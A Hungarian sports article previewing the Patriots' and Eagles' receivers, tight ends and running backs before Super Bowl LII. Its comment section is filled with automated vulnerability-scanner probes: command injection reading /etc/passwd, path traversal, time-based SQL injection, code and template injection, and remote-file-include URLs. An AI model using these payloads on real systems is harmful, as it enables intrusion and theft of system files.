Antonio Brownt kivágta a Patriots!

Super Bowl LII beharangozó #2: A skill playerek

2018. január 30., 22:52

Super Bowl felvezetőnket az elkapókkal, a tight endekkel és a futókkal folytatjuk

Super Bowl LII beharangozó #2: A skill playerek


A Patriots játékosa, Rob Gronkowski az előző cikkünk egyik főszereplőjéhez, Tom Brady-hez hasonlóan nem igényel különösebb introdukciót annak, aki az előző néhány szezonban látta a csapatot játszani (sőt már magyar nyelvre lefordított önéletrajzi könyve is megjelent!). Nem túlzás kijelenteni, hogy ő posztjának - talán minden idők - legjobbja, hiszen nem elég, hogy az elkapásoknál szinte megállíthatatlan, ha arra kerül a sor, blokkolni is hibátlanul képes. Gronk 2010-ben került a ligába második körösként, és kezdetben arról volt híres, hogy a tragikus sorsú Aaron Hernandezzel milyen bámulatos duót alkotnak. Ezután azonban teljesen ellentétes irányt vett a pályafutásuk, egykori csapattársával ellentétben Gronk az utóbbi évek egyik legmeghatározóbb figurájává vált. Gronk már az Arizona egyetemen is megmutatta, hogy termetéből kifolyólag milyen erős játékos és a sebessége is kiváló. Nem véletlenül döntött meg majdnem minden csúcsot már második NFL-es szezonjában: a legtöbb tight endek által elkapott yard és touchdown egy szezonban rekordját is ő tartja. Gronkot valószínűleg Malcolm Jenkins őrzi majd a Super Bowlon, akinek nyilván nem lesz könnyű dolga, viszont az utóbbi években bizonyította, hogy képes lehet lefékezni a félelmetes ellenfelét. A második számú tight end Dwayne Allen, akit a szezon előtt a Coltstól szerzett meg egy csere keretében a Patriots. Ő inkább szituációs játékos, passzjátékoknál inkább blokkolásra, mint elkapásra használják. A depth chart alján jelenleg az újonc Jacob Hollister van, aki a speciális csapatrészben vállal fontos szerepet, a támadásoknál nem jellemző, hogy túl sok szóhoz jutna.

A Patriots passzjátéka alapvetően Gronkowskira, valamint a gyors passzokra épül, az elkapók között pedig – Julian Edelman hiányában – Brandin Cooks-t és Danny Amendola-t érdemes kiemelni. Cooks az Oregon State egyetemre járt, ahol 2013-ban elnyerte az egyetemi játékosok között a legjobb elkapónak járó Biletnikoff díjat, aztán az első kör közepén a Saints vitte el, ahonnan három sikeres szezon után a Patriotshoz került egy csere következtében. Sokatmondó statisztika, hogy a fürge elkapó sorozatban három ezeryardos szezonon van túl. Danny Amendola NFL-es pályafutása összekapcsolódik a jelenlegi ellenféllel, mivel a 2009-es holtszezont az Eaglesnél töltötte, viszont az edzőcsapatból később elvitte a Rams, ahonnan meggyőző teljesítménye miatt néhány szezonnal később a Patriotshoz került. Amendola nagyon hálás, amiért esélyt kapott a Patriotsban: évről évre több millió dollárt enged a fizetéséből, hogy más csapatrészekre is jusson pénze a csapatnak.

Kettejükön kívül muszáj megemlíteni Chris Hogant, aki az alapszakaszban sokat volt sérült, de a rájátszásra visszatért, majd a Tennessee ellen csinált is egy touchdownt. Phillip Dorsett a Colts első köröseként nem volt meghatározó, ezért szintén csere keretében került a Patshez, ahol egyelőre epizodista, viszont a hozzá hasonló játékosok szoktak előkerülni a nagy meccseken. Sebességéből kifolyólag meglepetést is okozhat az Eagles védelmének. A depth chart alján a Clevelandből összeszedett Kenny Britt és a Tampa Bayből érkező Bernard Reedy szerepel, de nem valószínű, hogy őket Brady tömné a labdákkal.

Szinte biztosan pályán lesz viszont az a Dion Lewis, akit 2011-ben Andy Reid draftolt Philadelphiában LeSean McCoy cseréjének. Itt eleinte a visszahordásoknál kapott lehetőséget, majd Cleveland és Indianapolis érintésével került a Patriotshoz. Itt a súlyos sérülései ellenére sikerült meghatározó játékossá válnia, az idei pedig élete legjobb szezonja. 896 futott yard mellett 214-et el is kapott, jóllehet az ő jelenléte a számokon kívül azt is jelenti, hogy egy újabb playmakert tud Bill Belichick pályára küldeni. Lewist gyors irányváltásai és ügyes kezei miatt borzasztó nehéz levédekezni. A Bengalstól megszerzett Rex Burkhead Hoganhez hasonlóan sokat volt sérült, azonban a döntőn valószínűleg játszik. Ő a backfieldről indulva sokoldalúságával hozhatja kellemetlen helyzetbe a Philly védőit. Nem szabad megfeledkezni a tavalyi döntőn szinte a semmiből előhúzott James White-ról sem, az ő célja, hogy a tavalyi 3 touchdownját megismételje. A színvonalat emeli a fullback James Develin, akit idén a Pro Bowlba választottak, és ő is már kétszeres Super Bowl győztes. Futó poszton a depth chart alján Brandon Bolden szerepel, aki inkább a special teamben jut szóhoz, a nyitófordulóban 3 touchdownt futó Mike Gillislee pedig az utóbbi időben inaktív, így vasárnap sem valószínű, hogy nevezi Belichick a meccsre.

Az Eagles szintén sokoldalú és mély elkapó- és futósorral rendelkezik, mint az ellenfele. A tight endek közül az első számú Zach Ertz, aki a legtöbb labdát kaphatja. Ertz a Stanfordra járt, ahol 2011-ig Andrew Luck dobált neki, majd 2013-ban jelentkezett a draftra, ahol a második körben csapott le rá az Eagles. Ertz stílusát tekintve Gronkowskihoz nagyon hasonlító játékos. Az Eagles keretéből neki van ebben a szezonban a legtöbb elkapása, a legtöbb elkapott yardja és a második legtöbb touchdownja. A 27 éves tight end az egyik legpontosabb útvonalfutó játékos a ligában, ami sok segítséget jelenthet Nick Folesnak. Nem szabad elmenni szó nélkül a veterán Brent Celek mellett sem, aki jelenleg elmondhatja magáról, hogy a legrégebb óta tagja az Eaglesnek. Celek szerepe sokat alakult az évek során Phillyben, eleinte rengeteg elkapást és yardot jegyzett, mára inkább a blokkolási képességeit használják igen hatékonyan. Az ő feladata általában a fal szélén megtartani a védőt, besegíteni a tackleknek. Nyilvánvaló, hogy egy igazi csapatemberről van szó, akinek az egyéni elismerés másodlagos. Szerencsés helyzetben van az Eagles a téren is, hogy a csapat harmadik számú tight endje Trey Burton, akinek a jelentősége a passzjátékoknál kerül előtérbe. Burton egy biztos kezű, nagyobb testű elkapó tight end, aki eme kvalitásait kihasználva 5 touchdownt szerzett a szezonban.

Alshon Jeffery Chicagóból érkezett Philadelphiába a szezon előtt egy egyéves szerződés keretében, azonban a teljesítménye meggyőzte a vezetőséget, ezért az év közepén máris több évre hosszabbítottak vele. Nem hiába, hiszen a rájátszásban a Falcons ellen már megmutatta, hogy lehet rá számítani, a Vikings ellen pedig két touchdownt is elkapott. Jeffery egyébként a Patriots cornerbackjének, Stephon Gilmore-nak volt a szobatársa a South Carolina egyetemen, így kettejük párharca mindenképp kiemelendő. A másik elkapó pozícióban a Super Bowl győztes Torrey Smith, aki már tudja, hogyan kell megverni a Patriots-t. A San Francisco-i kitérővel Philadelphiába igazoló WR a 2013-as AFC döntőn 69 yardot szerzett a jelenlegi ellenfél ellen. Smithnek nincs olyan jó éve, mint várták, jónéhány elejtett labdája ellenében viszont a hosszú játékoknál még mindig szívesen fordul hozzá az aktuális irányító. Foles a Vikings ellen is megtalálta egy 41 yardos bombával, ami a meccs egyik legszebb jelenete volt. A belső elkapó a harmadéves Nelson Agholor, aki az első két szezonjában nem volt valami meggyőző, azonban 2017-ben több yardot és touchdownt szerzett, mint az első két évében összesen. Agholor egy gyors játékos, a rájátszásban néhány trükkös futásnál ezt a tulajdonságát szívesen kihasználta Doug Pederson. Hármukon kívül a magas újonc Mack Hollins felé mehet még labda, akinek tavaly Mitch Trubisky dobált a North Carolinán, a következő szezontól pedig nincs kizárva, hogy Torrey Smith helyét veszi át az Eaglesben.

LeGarrette Blount tavaly a Patriots-cal nyerte második Super Bowlját, most az Eagles running backjeként kap szerepet. Blount egy nagyobb linebacker méreteivel rendelkezik, testi erejét első sorban a belső futásoknál és a kemény rövid yardos játékoknál használhatja ki Pederson. Az utóbbi hetekben 10 cipelés körül kapott, hasonló mennyiségre számíthatunk ezen a meccsen is. A Philly igazi első számú running backje persze a szezon közben megszerzett Jay Ajayi, aki Londonban született, majd a Boise State egyetemen nyújtott maradandót nem csak az uborkalé ivással, de a játékával is. Ajayi egy olyan futó, amilyen LeSean McCoy óta nem volt Philadelphiában, nagyon mozgékony játékos, aki türelmes és jól lát a pályán. Hogy egy ilyen futót meg tudott szerezni az Eagles szezon közben, akit ráadásul főként a rájátszásra állítottak be első számú backnek, új löketet adott a csapatnak. Hasonlóan hasznos tagja a keretnek az újonc Corey Clement, ő szinte egy személyben testesíti meg a Philadelphia Underdogs együttesét. Clement draftolatlan újoncként, a depth chart legaljáról küzdötte fel magát a running back rotációba, kiszorítva Wendell Smallwoodot és Kenjon Barnert. Szerepe főként a harmadik downokon hangsúlyos, tekintve, hogy milyen jól teljesít az elkapásoknál és az irányító megvédésénél. Clement a posztján csupán harmadik számú, viszont – a fent tárgyalt Burtonhöz hasonlóan – 6 touchdownt jegyez az idei szezonban.

Nehéz lenne állást foglalni, melyik csapatnál van az előny a támadó skill pozíciókat tekintve. Ami Rob Gronkowski, Dion Lewis és Brandin Cooks az egyik oldalon, az a másik oldalon Zach Ertz, Jay Ajayi és Alshon Jeffery. Azt azért ki lehet jelenteni, hogy a védőknek volt már könnyebb dolga is a szezonban.

 

Szerző: Szőke Ádám (mustaine)


Hozzászólások

10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
response.write(9280201*9430593)
10 hónapja
Törölt felhasználó
'+response.write(9280201*9430593)+'
10 hónapja
Törölt felhasználó
"+response.write(9280201*9430593)+"
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
&cat /etc/passwd&
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
'&cat /etc/passwd&'
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20 and sleep(4)
10 hónapja
Törölt felhasználó
"&cat /etc/passwd&"
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
10 hónapja
Törölt felhasználó
cat /etc/passwd
10 hónapja
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
10 hónapja
Törölt felhasználó
20' and sleep(4)='
10 hónapja
Törölt felhasználó
`cat /etc/passwd`
10 hónapja
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
10 hónapja
Törölt felhasználó
../../../../../../../../../../etc/passwd
10 hónapja
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
10 hónapja
Törölt felhasználó
|cat /etc/passwd#
10 hónapja
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
10 hónapja
Törölt felhasználó
'|'ld
10 hónapja
Törölt felhasználó
20" and sleep(4)="
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
10 hónapja
Törölt felhasználó
"|"ld
10 hónapja
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
10 hónapja
Törölt felhasználó
${100375+100454}
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
10 hónapja
Törölt felhasználó
;cat /etc/passwd;
10 hónapja
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
268435455
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
10 hónapja
Törölt felhasználó
';cat /etc/passwd;'
10 hónapja
Törölt felhasználó
20'=sleep(4)='
10 hónapja
Törölt felhasználó
10 hónapja
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
";cat /etc/passwd;"
10 hónapja
Törölt felhasználó
20"=sleep(4)="
10 hónapja
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
10 hónapja
Törölt felhasználó
10 hónapja
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
10 hónapja
Törölt felhasználó
20&n995999=v960015
10 hónapja
Törölt felhasználó
||cat /etc/passwd
10 hónapja
Törölt felhasználó
20;select pg_sleep(4); --
10 hónapja
Törölt felhasználó
)
10 hónapja
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
10 hónapja
Törölt felhasználó
1e309
10 hónapja
Törölt felhasználó
/etc/passwd
10 hónapja
Törölt felhasználó
&dir
10 hónapja
Törölt felhasználó
20';select pg_sleep(4); --
10 hónapja
Törölt felhasználó
!(()&&!|*|*|
10 hónapja
Törölt felhasználó
testasp.vulnweb.com
10 hónapja
Törölt felhasználó
'"\'\");|]*{
<>
10 hónapja
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
10 hónapja
Törölt felhasználó
'&dir&'
10 hónapja
Törölt felhasználó
^(#$!@#$)(()))******
10 hónapja
Törölt felhasználó
20; waitfor delay '0:0:4' --
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
10 hónapja
Törölt felhasználó
"&dir&"
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20'; waitfor delay '0:0:4' --
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
10 hónapja
Törölt felhasználó
|dir
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20"; waitfor delay '0:0:4' --
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
10 hónapja
Törölt felhasználó
'|dir
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
file:///etc/passwd
10 hónapja
Törölt felhasználó
"|dir
10 hónapja
Törölt felhasználó
'"()
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
10 hónapja
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
WEB-INF\web.xml
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
10 hónapja
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
../../../../../../../../../../windows/win.ini
10 hónapja
Törölt felhasználó
acunetix_wvs_invalid_filename
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
../../../../../../../../../../boot.ini
10 hónapja
Törölt felhasználó
comment
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
10 hónapja
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
10 hónapja
Törölt felhasználó
comment
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
1'"
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
10 hónapja
Törölt felhasználó
comment/.
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
\
10 hónapja
Törölt felhasználó
//www.acunetix.tst
10 hónapja
Törölt felhasználó
................windowswin.ini
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
..\..\..\..\..\..\..\..\windows\win.ini
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó


]>
&acunetixent;
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
@@YUwEy
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
'"
10 hónapja
Törölt felhasználó
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
10 hónapja
Törölt felhasználó
20'"()&%
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
20
10 hónapja
Törölt felhasználó
JyI=
10 hónapja
Törölt felhasználó